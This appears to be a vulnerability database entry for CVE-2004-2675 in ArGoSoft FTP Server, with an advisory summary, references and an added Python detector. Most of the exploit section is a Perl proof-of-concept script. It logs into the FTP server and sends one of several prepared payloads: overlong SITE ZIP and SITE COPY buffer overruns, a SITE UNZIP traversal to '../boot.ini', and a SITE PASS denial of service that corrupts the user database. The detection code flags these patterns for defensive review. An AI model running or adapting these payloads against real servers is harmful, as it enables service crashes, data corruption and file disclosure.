ArGoSoft FTP Server Multiple Vulnerabilities

Vulnerability ID 1107766 Vulnerability type Unknown
Published 2004-02-27 Updated 2007-01-09
CVE ID CVE-2004-2675 CNNVD-ID CNNVD-200412-336
Platform Windows CVSS score 6.8
|Vulnerability source
https://www.exploit-db.com/exploits/23769
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-336
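|Vulnerability details
Versions of ArGoSoft FTP Server before 1.4.1.6 contain a vulnerability. A remote attacker can cause a denial of service (crash) via a SITE PASS command with an overly long password argument; the vulnerability corrupts the database.
|Exploit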
source: http://www.securityfocus.com/bid/9770/info

ArGoSoft has released version 1.4.1.6 of their FTP Server to address multiple unspecified security vulnerabilities. These issues include three buffer overruns when handling overly long FTP SITE ZIP and SITE COPY commands, a file enumeration issue involving the SITE UNZIP command and user database corruption denial of service attacks via the SITE PASS command. 

#!/usr/bin/perl
# Multiple Vulnerabilities in ArGoSoft FTP Server version 1.4 (1.4.1.4)
# Created by Beyond Security Ltd. - All rights reserved.

use IO::Socket;

$host = "192.168.1.243";

$remote = IO::Socket::INET->new ( Proto => "tcp",
     PeerAddr => $host,
     PeerPort => "2119",,
    );

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}


$remote->autoflush(1);

my $ftp = "USER username\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join("", "PASS ", "password", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

#$ftp = join ("", "SITE ZIP ", "A"x512, "\r\n");
#$ftp = join ("", "SITE ZIP storm.zip /f:", "A"x2048, "\r\n");
#$ftp = join ("", "SITE COPY ", "A"x2048, " ", "A"x10, "\r\n");
#$ftp = join ("", "SITE UNZIP ", "../boot.ini\r\n"); # Directory Traversal (we know a certain file exists)
#$ftp = join ("", "SITE PASS ", "storm ", "A"x3500, "\r\n"); # DoS ... against the user database

#Choose one of the above to test the vulnerabilities mentioned

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;
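
An added example, not part of the original advisory or exploit script: a Python check that an FTP proxy or a log reviewer could run over control-channel lines to flag the SITE command patterns the advisory describes. The 255-byte limit, the function names and the sample lines are assumptions constructed for illustration.

```python
import re

# Assumption, not from the advisory: longest SITE argument the policy accepts.
MAX_ARG_LEN = 255
# SITE subcommands named in the advisory text.
WATCHED = {"ZIP", "COPY", "UNZIP", "PASS"}
SITE_RE = re.compile(rb"^SITE[ \t]+([A-Za-z]+)(?:[ \t]+(.*))?$", re.I | re.S)


def inspect_command(line: bytes) -> list[str]:
    """Return findings for one FTP control-channel line (empty list = clean)."""
    m = SITE_RE.match(line.rstrip(b"\r\n"))
    if not m:
        return []
    sub = m.group(1).upper().decode("ascii")
    if sub not in WATCHED:
        return []
    arg = m.group(2) or b""
    findings = []
    if len(arg) > MAX_ARG_LEN:
        findings.append(f"SITE {sub}: argument is {len(arg)} bytes (limit {MAX_ARG_LEN})")
    # A '..' path component in SITE UNZIP points outside the user's directory.
    if sub == "UNZIP" and b".." in re.split(rb"[\\/\s]+", arg):
        findings.append("SITE UNZIP: path contains a '..' component")
    return findings


def scan(lines):
    """Return (line_number, finding) for every flagged command in a capture."""
    return [(n, f) for n, line in enumerate(lines, 1) for f in inspect_command(line)]


# Constructed sample capture of client commands (not taken from a real server).
SAMPLE = [
    b"USER alice\r\n",
    b"SITE ZIP backup.zip /f:report.txt\r\n",
    b"SITE COPY " + b"x" * 2048 + b" dest\r\n",
    b"site unzip ..\\archive.zip\r\n",
    b"SITE PASS alice " + b"x" * 3500 + b"\r\n",
]

if __name__ == "__main__":
    for n, finding in scan(SAMPLE):
        print(f"line {n}: {finding}")
```
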
|References

Source: BID
Name: 9770
Link: http://www.securityfocus.com/bid/9770
Source: SECUNIA
Name: 11002
Link: http://secunia.com/advisories/11002
Source: XF
Name: argosoftftp-site-pass-dos(15412)
Link: http://xforce.iss.net/xforce/xfdb/15412
Source: www.securiteam.com
Link: http://www.securiteam.com/windowsntfocus/5RP010KCAO.html
Source: OSVDB
Name: 11332
Link: http://www.osvdb.org/11332
Source: www.argosoft.com
Link: http://www.argosoft.com/rootpages/FtpServer/ChangeList.aspx